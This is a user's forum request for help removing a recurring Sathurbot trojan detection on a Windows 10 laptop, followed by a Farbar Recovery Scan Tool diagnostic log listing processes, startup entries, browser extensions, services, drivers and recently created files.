Every time I boot computer Eset Smart Security 9 inform me:
Object:
C:\ProgramData\Microsoft\Performance\Monitor\SecurityHelper.dll
Threat:
a variant of Win32\Sathurbot.R trojan
Information:
cleaned by deleting
Seems that is not cleaned very well since it comes on every boot.....
Below are FRST and Addition files.
Thanks in advance for support !
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-10-2016
Ran by admin (administrator) on ACERTRMATE-5744 (13-10-2016 12:00:29)
Running from C:\Users\admin\Downloads
Loaded Profiles: admin (Available Profiles: admin & user & DefaultAppPool)
Platform: Microsoft Windows 10 Pro Version 1607 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
( ) C:\Windows\System32\lmabcoms.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS32.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LMutilps32.exe
() C:\ProgramData\Digi Net Mobile\OnlineUpdate\ouc.exe
() C:\ProgramData\Mobile Partner\OnlineUpdate\ouc.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LManager.exe
(Primax Electronics Ltd.) C:\Windows\System32\ico.exe
(Dritek System Inc.) C:\Program Files\Launch Manager\LMworker.exe
() C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe
(PDFConverter.com) C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe
(Skillbrains) C:\Program Files\Skillbrains\lightshot\5.4.0.1\Lightshot.exe
(Google) C:\Program Files\Google\Drive\googledrivesync.exe
(Comfort Software Group) C:\Program Files\FreeAlarmClock\FreeAlarmClock.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(MagicISO, Inc.) C:\Program Files\MagicDisc\MagicDisc.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google) C:\Program Files\Google\Drive\googledrivesync.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x86__kzf8qxf38zg5c\SkypeHost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Acer Incorporated) C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [10082920 2016-10-03] (Realtek Semiconductor)
HKLM\...\Run: [Power Management] => C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe [715368 2011-02-22] (Acer Incorporated)
HKLM\...\Run: [LManager] => C:\Program Files\Launch Manager\LManager.exe [1097808 2011-04-19] (Dritek System Inc.)
HKLM\...\Run: [Mouse Suite 98 Daemon] => C:\WINDOWS\system32\ICO.EXE [57344 2004-07-14] (Primax Electronics Ltd.)
HKLM\...\Run: [LifeCam] => C:\Program Files\Microsoft LifeCam\LifeExp.exe [135536 2010-12-13] (Microsoft Corporation)
HKLM\...\Run: [RioServer] => C:\Program Files\Whiteboard\Server\Server.exe [2128384 2015-05-11] ()
HKLM\...\Run: [EaseUS EPM Tray Agent] => C:\Program Files\EaseUS\EaseUS Partition Master 10.8\bin\TrayPopupE\TrayTipAgentE.exe [255072 2014-11-18] ()
HKLM\...\Run: [PDF Converter Elite 4.0 Print Dispatcher] => C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\PDFConverterElite.PrnDisp.exe [9052368 2015-08-11] (PDFConverter.com)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [Xvid] => C:\Program Files\Xvid\CheckUpdate.exe [8192 2011-01-17] ()
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [GoogleDriveSync] => C:\Program Files\Google\Drive\googledrivesync.exe [23375200 2016-07-29] (Google)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [FreeAC] => C:\Program Files\FreeAlarmClock\FreeAlarmClock.exe [3015072 2016-01-19] (Comfort Software Group)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\Run: [GoogleChromeAutoLaunch_A822CA3D40D4B8944864CFEA751D8D57] => C:\Program Files\Google\Chrome\Application\chrome.exe [966760 2016-09-25] (Google Inc.)
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...0c966feabec1\InprocServer32: [Default-shell32] ATTENTION
HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...A8F59079A8D5}\localserver32: <==== ATTENTION
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll [2016-07-29] (Google)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-03-14] ()
Startup: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MagicDisc.lnk [2014-11-12]
ShortcutTarget: MagicDisc.lnk -> C:\Program Files\MagicDisc\MagicDisc.exe (MagicISO, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\KYESCAN.lnk [2014-11-24]
ShortcutTarget: KYESCAN.lnk -> C:\Program Files\ScannerU\KyeScan.exe (KYE SYSTEMS CORP.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WhiteboardServer.lnk [2015-11-02]
ShortcutTarget: WhiteboardServer.lnk -> C:\Program Files\Whiteboard\Server\Server.exe ()
GroupPolicy: Restriction ? <======= ATTENTION
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
Tcpip\..\Interfaces\{14eb4dc7-f99f-4287-88e7-2343b54f9db1}: [DhcpNameServer] 192.168.200.1
Tcpip\..\Interfaces\{3224bbc1-d84b-409d-b253-4909f71b7894}: [NameServer] 193.231.252.1 213.154.124.1
Tcpip\..\Interfaces\{3224bbc1-d84b-409d-b253-4909f71b7894}: [DhcpNameServer] 193.231.252.1 213.154.124.1
Tcpip\..\Interfaces\{53f8ca76-ad85-4fde-8293-d2acdb33f4ce}: [DhcpNameServer] 81.12.128.206 81.12.132.206
Tcpip\..\Interfaces\{f03e07f8-5e73-4422-ac22-023e660167d7}: [DhcpNameServer] 192.168.42.129
Internet Explorer:
==================
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0014-0002-0012-ABCDEFFEDCBA} hxxp://java.sun.com/products/plugin/autodl/jinstall-142-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/products/plugin/autodl/jinstall-180-windows-i586.cab
FireFox:
========
FF DefaultProfile: zbknj5di.default
FF ProfilePath: C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default [2016-10-11]
FF Homepage: Mozilla\Firefox\Profiles\zbknj5di.default -> hxxp://www.google.com
FF Extension: (AdBeaver) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\
[email protected] [2016-04-25]
FF Extension: (Firefox Hotfix) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\
[email protected] [2016-09-13]
FF Extension: (Public Fox) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{9AA46F4F-4DC7-4c06-97AF-6665170634FE}.xpi [2016-05-18]
FF Extension: (Cookies Manager+) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{bb6bc1bb-f824-4702-90cd-35e2fb24f25d} [2016-09-26]
FF Extension: (Adblock Plus) - C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\zbknj5di.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-09]
FF Plugin: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-23] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-08-23] (Google Inc.)
FF Plugin: @tracker-software.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-07-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-4142771536-1505296934-324239511-1000: @citrixonline.com/appdetectorplugin -> C:\Users\admin\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-12-09] (Citrix Online)
FF Plugin HKU\S-1-5-21-4142771536-1505296934-324239511-1000: @docu-track.com/PDF-XChange Viewer Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Viewer\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFFICE.DLL [2003-07-14] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2016-07-28] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npPDFXCviewNPPlugin.dll [2016-04-19] (Tracker Software Products (Canada) Ltd.)
Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://home.sweetim.com/?crg=3.1010000&barid={B75E1632-9425-49F7-BC12-6CE69451C061}"
CHR Profile: C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default [2016-10-13]
CHR Extension: (Google Slides) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-04]
CHR Extension: (Google Docs) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-04]
CHR Extension: (Google Drive) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-10]
CHR Extension: (YouTube) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-12-10]
CHR Extension: (Adblock Plus) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-08-24]
CHR Extension: (Google Search) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-10]
CHR Extension: (Google Sheets) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-04]
CHR Extension: (Avira Browser Safety) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2016-09-21]
CHR Extension: (Google Docs Offline) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Pinterest Save Button) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2016-09-23]
CHR Extension: (RCS & RDS Media Player Extension) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hckkiiidciekfeicdlmmomipcngnfjhl [2016-03-28]
CHR Extension: (Shodan) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jjalcfnidlmpjhdfepjhjbhnhkbgleap [2015-04-07]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2016-01-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-04]
CHR Extension: (Google Chrome to Phone Extension [DEPRECATED]) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oadboiipflhobonjjffjbfekfjcgkhco [2015-12-10]
CHR Extension: (Gmail) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-06]
CHR Extension: (Chrome Media Router) - C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-22]
CHR HKU\S-1-5-21-4142771536-1505296934-324239511-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 Digi Net Mobile. RunOuc; C:\Program Files\Digi Net Mobile\UpdateDog\ouc.exe [239968 2014-11-14] ()
R2 ekrn; C:\Program Files\ESET\ESET Smart Security\ekrn.exe [2171280 2016-10-10] (ESET)
R2 ePowerSvc; C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe [739944 2011-02-22] (Acer Incorporated)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [271712 2011-03-14] ()
R2 lmab_device; C:\Windows\system32\LMabcoms.exe [593920 2009-12-07] ( ) [File not signed]
S2 Mobile Partner. RunOuc; C:\Program Files\Mobile Partner\UpdateDog\ouc.exe [655712 2014-12-15] ()
S3 rpcapd; C:\Program Files\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [1887272 2016-10-04] (Microsoft Corporation)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [7534864 2016-08-25] (TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [271496 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [84928 2016-07-16] (Microsoft Corporation)
R2 WOLAgent; C:\Program Files\Aquila Technology\WOLAgent\WOLAgent.exe [7168 2014-01-28] () [File not signed]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 athr; C:\WINDOWS\System32\drivers\athwn.sys [3228672 2016-07-16] (Qualcomm Atheros Communications, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [108032 2016-04-25] (Samsung Electronics Co., Ltd.)
R1 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [206472 2016-10-10] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [14976 2016-06-23] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [156320 2016-06-23] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [121504 2016-10-10] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [162472 2016-06-23] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [52904 2016-06-23] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [71336 2016-06-23] (ESET)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [15968 2014-11-18] ()
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [10208 2014-11-18] ()
R3 mcdbus; C:\WINDOWS\System32\drivers\mcdbus.sys [116736 2009-02-24] (MagicISO, Inc.) [File not signed]
S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [56672 2016-10-05] (Avago Technologies)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [62976 2016-07-16] ()
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 USBPcap; C:\WINDOWS\system32\DRIVERS\USBPcap.sys [33016 2015-12-10] (USBPcap)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37912 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [244576 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [100192 2016-07-16] (Microsoft Corporation)
U3 idsvc; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-10-13 12:00 - 2016-10-13 12:00 - 00000000 ____D C:\Users\admin\Downloads\FRST-OlderVersion
2016-10-13 11:43 - 2016-10-13 11:43 - 00000000 ___HD C:\OneDriveTemp
2016-10-13 11:16 - 2016-10-13 11:41 - 00379758 _____ C:\WINDOWS\ntbtlog.txt
2016-10-13 10:02 - 2016-10-13 10:03 - 00000000 ____D C:\Users\admin\Downloads\12697_en(MT4 INDICATOR TO CSV FILE)
2016-10-13 09:26 - 2016-10-05 12:18 - 01283584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-10-13 09:26 - 2016-10-05 12:10 - 00754688 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-10-13 09:26 - 2016-10-05 12:08 - 01524224 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-10-13 09:26 - 2016-10-05 12:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-10-13 09:26 - 2016-10-05 12:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-10-13 09:25 - 2016-10-05 13:10 - 00231776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-10-13 09:25 - 2016-10-05 13:05 - 00892008 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-10-13 09:25 - 2016-10-05 13:05 - 00784576 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-10-13 09:25 - 2016-10-05 13:05 - 00099680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys
2016-10-13 09:25 - 2016-10-05 13:03 - 06015840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-10-13 09:25 - 2016-10-05 13:03 - 01724584 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-10-13 09:25 - 2016-10-05 13:03 - 01072280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-10-13 09:25 - 2016-10-05 13:03 - 00946272 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-10-13 09:25 - 2016-10-05 12:59 - 00949600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-10-13 09:25 - 2016-10-05 12:54 - 01097568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2016-10-13 09:25 - 2016-10-05 12:53 - 00154976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-10-13 09:25 - 2016-10-05 12:51 - 01430720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-10-13 09:25 - 2016-10-05 12:50 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-10-13 09:25 - 2016-10-05 12:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2016-10-13 09:25 - 2016-10-05 12:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-10-13 09:25 - 2016-10-05 12:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 03892352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-10-13 09:25 - 2016-10-05 12:46 - 00056672 _____ (Avago Technologies) C:\WINDOWS\system32\Drivers\MegaSas2i.sys
2016-10-13 09:25 - 2016-10-05 12:45 - 00198496 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-10-13 09:25 - 2016-10-05 12:41 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-10-13 09:25 - 2016-10-05 12:40 - 01968480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-10-13 09:25 - 2016-10-05 12:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConfigureExpandedStorage.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2016-10-13 09:25 - 2016-10-05 12:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00229888 _____ C:\WINDOWS\system32\wc_storage.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2016-10-13 09:25 - 2016-10-05 12:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00327680 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovs.dll
2016-10-13 09:25 - 2016-10-05 12:26 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00267776 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-10-13 09:25 - 2016-10-05 12:25 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-10-13 09:25 - 2016-10-05 12:24 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-10-13 09:25 - 2016-10-05 12:24 - 00113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-10-13 09:25 - 2016-10-05 12:23 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00373760 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2016-10-13 09:25 - 2016-10-05 12:23 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogs3D.dll
2016-10-13 09:25 - 2016-10-05 12:23 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-10-13 09:25 - 2016-10-05 12:22 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-10-13 09:25 - 2016-10-05 12:22 - 00325632 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 03689984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-10-13 09:25 - 2016-10-05 12:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-10-13 09:25 - 2016-10-05 12:20 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-10-13 09:25 - 2016-10-05 12:20 - 00303104 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2016-10-13 09:25 - 2016-10-05 12:18 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-10-13 09:25 - 2016-10-05 12:18 - 00858112 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-10-13 09:25 - 2016-10-05 12:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\adsmsext.dll
